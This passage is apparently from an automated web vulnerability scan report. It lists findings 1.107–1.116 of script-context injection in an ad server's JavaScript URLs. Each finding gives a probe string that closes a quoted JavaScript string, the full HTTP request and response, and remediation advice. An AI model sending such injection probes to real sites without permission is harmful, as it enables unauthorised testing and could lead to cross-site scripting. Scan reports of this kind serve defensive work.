if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

1.107. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6eb6c'%3b5079f91ec4f was submitted in the REST URL parameter 8. This input was echoed as 6eb6c';5079f91ec4f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105/0/0/203687990/2036879906eb6c'%3b5079f91ec4f//0/203/9542//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1711
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:43 GMT
Date: Sat, 26 Feb 2011 01:49:43 GMT
Connection: close


var zzADS_CHAN = '203687990';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<a href="http://o1.qnsr.com//cgi/c?a=20142921;x=15105;c=203687990,2036879906eb6c';5079f91ec4f;i=0;n=203;s=9542;q=1;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-3?mpt=%r">
...[SNIP]...

1.108. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76eb8'%3b154269bab02 was submitted in the REST URL parameter 9. This input was echoed as 76eb8';154269bab02 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105/0/0/203687990/203687990//076eb8'%3b154269bab02/203/9542//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1711
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:46 GMT
Date: Sat, 26 Feb 2011 01:49:46 GMT
Connection: close


var zzADS_CHAN = '203687990';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<a href="http://o1.qnsr.com//cgi/c?a=20142921;x=15105;c=203687990,203687990;i=076eb8';154269bab02;n=203;s=9542;q=1;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-3?mpt=%r">
...[SNIP]...

1.109. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44e74'%3b34f7324748b was submitted in the REST URL parameter 10. This input was echoed as 44e74';34f7324748b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/0/203687985/203687985//0/20344e74'%3b34f7324748b/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:51 GMT
Date: Sat, 26 Feb 2011 01:49:51 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=20344e74';34f7324748b%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

1.110. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a862'%3bf3353a7f709 was submitted in the REST URL parameter 11. This input was echoed as 3a862';f3353a7f709 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/95423a862'%3bf3353a7f709//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2591963
Expires: Mon, 28 Mar 2011 01:49:17 GMT
Date: Sat, 26 Feb 2011 01:49:54 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=95423a862';f3353a7f709%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

1.111. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cb8a'%3b33ba26914f6 was submitted in the REST URL parameter 4. This input was echoed as 3cb8a';33ba26914f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/23053cb8a'%3b33ba26914f6/0/0/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2591963
Expires: Mon, 28 Mar 2011 01:48:54 GMT
Date: Sat, 26 Feb 2011 01:49:31 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=23053cb8a';33ba26914f6%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

1.112. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13ac3'%3be8a5b3462de was submitted in the REST URL parameter 5. This input was echoed as 13ac3';e8a5b3462de in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/013ac3'%3be8a5b3462de/0/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:35 GMT
Date: Sat, 26 Feb 2011 01:49:35 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=013ac3';e8a5b3462de,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

1.113. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53bb2'%3b1831e25c1a7 was submitted in the REST URL parameter 6. This input was echoed as 53bb2';1831e25c1a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/053bb2'%3b1831e25c1a7/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2591979
Expires: Mon, 28 Mar 2011 01:49:17 GMT
Date: Sat, 26 Feb 2011 01:49:38 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=0,053bb2';1831e25c1a7%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

1.114. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 553df'%3b09d71b838b7 was submitted in the REST URL parameter 7. This input was echoed as 553df';09d71b838b7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/0/203687985553df'%3b09d71b838b7/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1585
Cache-Control: max-age=2591987
Expires: Mon, 28 Mar 2011 01:49:28 GMT
Date: Sat, 26 Feb 2011 01:49:41 GMT
Connection: close


var zzADS_CHAN = '203687985553df';09d71b838b7';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

1.115. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f3d6'%3bcc30eb8bed2 was submitted in the REST URL parameter 8. This input was echoed as 9f3d6';cc30eb8bed2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/0/203687985/2036879859f3d6'%3bcc30eb8bed2//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2591986
Expires: Mon, 28 Mar 2011 01:49:30 GMT
Date: Sat, 26 Feb 2011 01:49:44 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=0,0%3Bc=203687985,2036879859f3d6';cc30eb8bed2%3Bi=0%3Bn=203%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

1.116. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d59e1'%3ba8fb555b141 was submitted in the REST URL parameter 9. This input was echoed as d59e1';a8fb555b141 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/0/203687985/203687985//0d59e1'%3ba8fb555b141/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:47 GMT
Date: Sat, 26 Feb 2011 01:49:47 GMT
Connection: close


var zzADS_CHAN = '203687985';
